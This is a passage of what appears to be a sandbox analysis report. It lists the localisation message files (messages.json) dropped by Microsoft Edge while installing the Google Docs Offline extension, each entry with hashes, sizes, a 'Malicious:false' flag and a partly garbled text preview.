                                                                                                                                                                                                                                                                                                  SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                                  SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                                  SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):990
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                                  MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                                  SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                                  SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                                  SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1658
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                                  MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                                  SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                                  SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                                  SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1672
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                                  MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                                  SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                                  SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                                  SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):935
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                                  MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                                  SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                                  SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                                  SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1065
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                                  MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                                  SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                                  SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                                  SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2771
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                                  MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                                  SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                                  SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                                  SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):858
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                                  MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                                  SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                                  SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                                  SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):954
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                                  MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                                  SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                                  SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                                  SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):899
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                                  MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                                  SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                                  SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                                  SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2230
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                                  MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                                  SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                                  SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                                  SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1160
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                                  MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                                  SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                                  SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                                  SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):3264
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                                  MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                                  SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                                  SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                                  SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir2436_309443540\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
